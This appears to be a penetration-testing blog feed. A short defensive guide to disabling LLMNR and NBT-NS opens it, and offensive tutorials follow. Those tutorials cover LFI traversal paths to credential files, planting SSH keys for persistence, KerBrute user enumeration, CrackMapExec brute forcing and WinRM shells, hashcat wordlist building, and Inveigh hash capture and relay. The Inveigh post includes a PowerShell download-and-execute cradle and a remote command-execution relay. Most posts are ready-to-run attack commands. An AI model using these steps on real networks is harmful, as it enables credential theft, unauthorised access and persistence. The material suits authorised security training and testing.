General Blog

Disabling LLMNR and NBT-NS in Your Network

I’ve made a handful of articles on attacking LLMNR within Active Directory environments, but I’ve never made anything that helps IT Admins mitigate this vulnerability. This post intends to serve as a guide for patching this vulnerability that is enabled by default in Windows.

Keep in mind that we need to not only disable LLMR, but also NBT-NS.

Table of Contents:

  • What is LLMNR & NBT-NS?
  • Great! So how can I exploit this?
  • Eek. So how do we patch this?
    • Disable LLMNR via Group Policy
    • Disable LLMNR via Command Line
    • Disable NBT-NS via Registry
    • Disable NBT-NS via PowerShell

What is LLMNR & NBT-NS?

Crowe.com does a fantastic job at giving you a high-level overview of what NetBIOS & link-local multicast name resolution do. Instead of reinventing the wheel, I will simply provide an excerpt from their website below.

“NetBIOS and LLMNR are protocols used to resolve host names and facilitate communication between hosts on local networks. NetBIOS is generally outdated and can be used to communicate with legacy systems. LLMNR is designed for consumer-grade networks in which a domain name system (DNS) server might not exist.”

If none of this sounds familiar, I highly recommend checking out the below link and reading more about these protocols before moving on.

https://www.crowe.com/cybersecurity-watch/netbios-llmnr-giving-away-credentials


Great! So how can I exploit this?

When a computer requests access to a legitimate network resource, it usually follows a set of pre-defined queries. LLMNR and NetBIOS come into play as last resort options when other methods (such as DNS or local hosts files) don’t prove helpful. Since LLMNR & NetBIOS will attempt name resolution via broadcasted requests to the broadcast-domain, we can set up tools to listen for these requests and respond back pretending to be the intended recipient.

Name Resolution Response Attack

If you’re interested in learning how attackers abuse this protocol, check out one of my guides below.


Eek. So how do we patch this?

Disable LLMNR via Group Policy

In Windows Active Directory, resolving this problem is as simple as applying a GPO. Sign into your Domain Controller and navigate to the Group Policy Management Editor. You’ll want to right click on your FQDN and select Create a GPO in this domain, and Link it here.

Go ahead and give it a name and click OK.

Then you’ll want to right-click on it and select Edit.

Now we just need to navigate to the following policy.

Computer Configuration -> Administrative Templates -> Network -> DNS Client -> Turn Off Multicast Name Resolution

Enable the policy by changing its value to Enabled.

Disable LLMNR via PowerShell / Command Line

But what do you do if you aren’t working with a Windows Active Directory domain? You can still patch this problem using the command line.

REG ADD  “HKLM\Software\policies\Microsoft\Windows NT\DNSClient”
REG ADD  “HKLM\Software\policies\Microsoft\Windows NT\DNSClient” /v ” EnableMulticast” /t REG_DWORD /d “0” /f

Disable NBT-NS via Registry

Open the registry by typing Regedit in the run dialogue. Navigate to registry key at the following location.

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\

From here, we’ll be presented with multiple keys, each represents a network interface. You’ll want to adjust the NetbiosOptions value on each from the default of zero, to a value of 2.

Disable NBT-NS via PowerShell

To take care of the above mention step via PowerShell, you can run the following commands.

$regkey = "HKLM:SYSTEM\CurrentControlSet\services\NetBT\Parameters\Interfaces"
Get-ChildItem $regkey |foreach { Set-ItemProperty -Path "$regkey\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose}

That’s it! You should be all set.

Tips & Tricks

Exploiting PHP Based LFI


Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.


Files to check while enumerating LFI:

../../../../../../../etc/passwd
../../../../../../../home/<users>/.ssh/authorized_keys
../../../../../../../home/<users>/.ssh/bash_history

To get the username of who we’re running as:
../../../../../../../proc/self/environ

To see what binary is running this service:
../../../../../../../proc/self/cmdline

If you have Tomcat running as well, you may want to enumerate these:

../../../../../../../usr/share/tomcat9/bin/catalina.sh
../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
../../../../../../../usr/share/tomcat9/conf/tomcat-users.xml

Note: Make sure to adjust the version number located in the path.

Hacking Tutorial

Dropping SSH Keys on Compromised Linux Hosts

Once you have a reverse shell, you may want to consider dropping a SSH key so that you can return at a later time. This guide intends to serve as a quick tutorial on how to do this.


From the Compromised Remote Host:

Navigate to and/or create the following directory.

/home/<user>/.ssh

Change into it, and then run the following command.

ssh-keygen -f id_rsa

This should generate a private key along with a public key. You’ll want to create an “authorized_keys” file by running the following command.

cat id_rsa.pub > authorized_keys

Then you’ll want to take your private key to your local system by running the following command and copying the contents.

cat id_rsa


On Your Local System:

Create a new file by running the following command and pasting the contents of your clipboard.

vi id_rsa

Then make the appropriate file permissions changes.

chmod 600 id_rsa

That’s it! You should now be able to SSH in.

ssh user@targetIP

Tips & Tricks

Quickly Formatting Nmap Output to Comma Separate Open Ports

There are times where you want to run a quick Nmap scan to see what ports are open, and then rerun a more in-depth Nmap scan on those specific ports. Doing it this way will allow you to lessen the amount of time it takes to run the scan, as you aren’t wasting time trying to run Nmap scripts or enumerate version information on ports that aren’t open.

Your initial scan make look something like this.

sudo nmap -p- <target> -oA nmap/quick

You can then run the following to retrieve a command separated list of open ports you can copy/paste to your next command.

cat nmap/quick | grep open | awk -F/ '{print $1}' ORS=','; echo

Hacking Tutorial

Enumerating Valid Active Directory Usernames with KerBrute

When you come in contact with a Windows domain, you may want to try and leverage Password Spraying attacks (really, you should –they’re super effective). But how do you get a valid list of usernames to load into your password sprayer?


Downloading the Tool

You could leverage a tool called KerBrute to pull this off. A quick Google search on this tool returns the following Github page.

https://github.com/ropnop/kerbrute

You can also download precompiled binaries from the following.

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3


Setting Up our Attack

With the tool in hand, we can view the help documentation.

Now we just need to prepare a list of users to enumerate. If you’ve already started to find usernames around the network, you can make your own customer user list. Otherwise, you can leverage something from the seclists usernames list, which can be downloaded at the following page.

https://github.com/danielmiessler/SecLists

The syntax for the command is very straightforward.

sudo ./kerbrute userenum -d <domain> <userList>

And just like that, we can see that all of the usernames we provided in our file are valid!

Note: It may be worthwhile to add a “known invalid” username to your userlist, just to make sure the server isn’t configured to respond stating all users are valid, whether or not that is true.

Tips & Tricks

Getting Shells With CrackMapExec

I love CrackMapExec. Seriously, it’s one of my favorite tools to use for internal Active Directory pentesting. Once you find valid credentials, you can throw it into this tool to pass it around the network and see where else those creds are valid. Let’s say you find a password within a log file, but don’t know what username its for? CrackMapExec will tell you. Let’s say you compromise a machine and dump the SAM database and are curious what other machines the hashes might be valid on? CrackMapExec will tell you.

This post intends to serve as a guide for some additional things that I’ve learned about CrackMapExec, that I want to remember in the future. This is far from a comprehensive list of what the tool can do, but it will be updated over time.


Mass Execution of Commands

Let’s say you’ve captured elevated credentials for a user that is admin on multiple machines across the domain. You can use the -c flag to execute commands.

I made a post that used this feature of CME to mass deploy Covenant launchers. You can check that out at Using CrackMapExec to Install Covenant C2 Launchers.


Brute Forcing

This tool is extremely useful for many use cases, but did you know it can also perform brute force attacks?

Let’s create a user list along with a password list. Then we can just feed it to CME with the following syntax.

crackmapexec smb <target> -u <users.txt> -p <passwords.txt> --continue-on-success

Note: Be careful when doing this, as you will lock out users if there is a password policy in place.


Don’t Sleep on WinRM

Once you’ve found valid credentials, CrackMapExec’s SMB function will only display “Pwn3d” if the user is a local administrator. However, there is another function that you can try instead.

crackmapexec winrm <target> -u <user> -p <password>

If this returns Pwn3d, then you can leverage EvilWinRM to get the shell.

evil-winrm -i <target> -u <username> -p <password>

Tips & Tricks

Changing Active Directory Password Using smbpasswd

If you’re able to get valid user credentials, but you’re unable to login because the password has expired and/or needs to be changed, you can leverage this tool in Kali Linux.

smbpasswd -U <username> -r <domainController>

Note: You can use either the FQDN of the Domain Controller, or it’s IP address.

This tool will prompt you for the current password of the user, along with what password you desire.

Tips & Tricks

Using Hashcat Rules to Create Custom Wordlists

When on an engagement, it is common to need a custom wordlists for either Password Spraying, or Password Cracking when you have captured some hashes. This post intends to serve as a quick guide for leveraging Hashcat rules to help you build effective custom wordlists.


To start, let’s begin with setting the scenario up. In our fictional scenario, we’ll be targeting an Active Directory domain named NBA.local. Let’s begin by creating a handful of words that would be likely for this domain. We’re only going to start with a few words, as our list is going to grow exponentially when we start applying rules to them. In a real engagement, you may want to gather 10-20 words to use.

Here’s the list I started with.

Now we’ll take this list, and feed it through Hashcat’s Best64 rule.

hashcat --force <wordlist> -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words.txt

You can see from the screenshot that we turned our list that previously contained 4 words into a list that now contains 308 words! But if you look through the list, you’ll see it doesn’t contain any symbols. To fix this, we can create our own custom rule called append_exclamation.rule that contains the following:

:
$!

Now we can run hashcat again, but this time we’ll specify both rules instead of just the one.

hashcat --force <wordlist> -r append_exclamation.rule -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words.txt

This time when we check the number of words in the list, we see exactly double what we had before! This is because the list has the same 308 words as last time, but now also has them all with an exclamation added.

Hacking Tutorial

Capturing & Relaying Net-NTLM Hashes Without Kali Linux Using Inveigh

I’ve recently uploaded part three of my LLMNR series. If you’ve missed it, I’ve used Responder and NTLMRelayX with Kali Linux to:

But what happens if you’re on a red team engagement or are otherwise unable to utilize Kali Linux? Trying to get Responder and Impacket running in Windows is a pain, but luckily there is another tool that we can leverage!

Table of Contents

  • Importing Inveigh Module
  • Basics of Running Inveigh
  • Capturing Hashes in Inveigh
  • Relaying Hashes Captured w/ HTTP Proxy
  • Performing SMB to SMBRelay w/ Inveigh
  • Conclusion

Importing Inveigh Module

A quick Google search for “Github Inveigh” returns the following page.

https://github.com/Kevin-Robertson/Inveigh

Before going too far, I’d also highly recommend bookmarking the Inveigh Wiki page. This is where you’ll find details on all of the available parameters.

https://github.com/Kevin-Robertson/Inveigh/wiki

Feel free to download this tool using whatever method works for you, but I personally like to install the Git Bash for Windows utility and install it as if I’m in Linux. If you need a hand getting this installed, check out my guide Installing Git Bash for Windows.

In true wannabe Linux fashion, I like to create a \opt directory in the root of my C:\ drive. This is where I’ll launch my Git Bash session and run the following command to download Inveigh.

git clone https://github.com/Kevin-Robertson/Inveigh.git

Now let’s spin up a PowerShell instance, change into the newly created \Inveigh directory, set our Execution Policy to Remote Signed, and import the script.

Note: You may need to run this as Administrator to take full advantage of all features.

cd C:\opt\Inveigh
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned
Import-Module ./Inveigh.psd1

Alternatively, you could bypass the need to download the scripts and just load the script directly into memory by using the following:

IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1")

OR

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.psd1")


Basics of Running Inveigh

At this point, Inveigh should be imported into the PowerShell session, waiting for us to call on it. We can start listening to requests on the network by using the following command. While not all of these parameters may be required, I like to use them.

  • -ConsoleOutput : Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn’t hang the shell. Medium and Low can be used to reduce output.
  • -NBNS : Enable/Disable NBNS spoofer.
  • -HTTPS : Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires local administrator access.
  • -Proxy : Enable/Disable proxy server authentication captures.
  • -IP : Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing if the SpooferIP parameter is not set.

Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP <attackerIP>

At this point, the listener will be active and output should be displayed on screen. By default, DNS requests being broadcasted on the network will also be displayed in this window, giving you some insight as to what devices and users on the network are doing.

If you press any key in this window, it will stop the live view of requests, but keep the listener running. You can then utilize the following commands, as desired.

Clear-Inveigh – clear the $inveigh hashtable
Get-Inveigh – get data from the $inveigh hashtable
Stop-Inveigh – stop all running Inveigh modules
Watch-Inveigh – enable real time console output

Note: When using Get-Inveigh, I like to add the -NTLMv2 parameter to return all NTLMv2 hashes that were captured.


Capturing Hashes in Inveigh

As long as you have your listener running from before, capturing the hashes should be trivial. We just need to wait for LLMNR to kick in, or for a user to browse your SMB/HTTP shares. Let’s give things a little push in my virtual environment, by attempting to browse to a share that doesn’t exist.

Once we do that, we can head over to our Inveigh window. If you have live output being displayed, you should see the NTLMv2 hash presented to you. If you do not have live output running, you can issue the following command into your PowerShell window.

Get-Inveigh -NTLMv2


Relaying Hashes Captured w/ HTTP Proxy

In addition to capturing hashes, we can also relay hashes as long as their captured in our HTTP proxy. However, this may be a bit of a challenge, because majority of hashes are captured via SMB. Inveigh does not currently support relaying hashes captured via SMB.

To being, we’ll import the Inveigh-Relay.ps1 module.

. ./Inveigh-Relay.ps1

And then the syntax is very straightforward. We just need to specify the target to relay our Net-NTLM hash to, along with what command to run once we have a valid administrator account captured. In addition to this, Invoke-InveighRelay also has some additional “Attack Modes”.

  • Enumerate – The enumerate attack can perform Group, User, Share, and NetSession enumeration against a target.
  • Execute – Performs PSExec style command execution. In previous versions of Inveigh Relay, this was the only available attack. Note, they removed SMB1 support.
  • Session – Inveigh Relay can now establish and maintain privileged/unprivileged authenticated SMB sessions. The sessions can be accessed with Invoke-SMBClientInvoke-SMBEnum, and Invoke-SMBExec from their Invoke-TheHash project. Inveigh Relay will attempt to keep the sessions open as long as the module is running.

My example command will look like this.

Invoke-InveighRelay -ConsoleOutput Y -Target <targetIP> -Command "whoami" -Attack Enumerate,Execute,Session

Now here’s the issue. I mentioned that we couldn’t relay a SMB connection like we can with Responder. This means browsing to a fake share no longer does anything for us. However, we can browse to our hosted HTTP proxy as a quick proof of concept.

Now there is a lot going on in this image, but let’s break this down.

  1. On the left side, we can see the victim browsed to the HTTP server hosted by Inveigh. Inveigh then relayed that hash to the specified target.
  2. Because the user had local admin rights on the target, we could see that we were successfully able to enumerate the local admin users and custom file shares.
  3. We were also able to execute the command we specified when setting up our Invoke-InveighRelay command.

Performing SMB to SMBRelay w/ Inveigh

Previously, I said we are unable to relay a captured hash from SMB to a target via SMB, which is why I had to do my proof of concept using the HTTP Proxy. However, the creator of Inveigh, Kevin Robertson, has had luck with blocking port 445 to encourage clients to use WebDav Port 80 as a failover.

This did not work for me in my test lab, but I wanted to mention it here in case it works for you.


Conclusion

Overall, I think Inveigh is a handy tool if you’re in a pinch, or dealing with a Windows-only scenario and want to try your luck at capturing Net-NTLM hashes. However, I think I still prefer Responder as it seems to be more feature rich for relaying hashes than what we’re currently able to do with Inveigh.

What are your thoughts?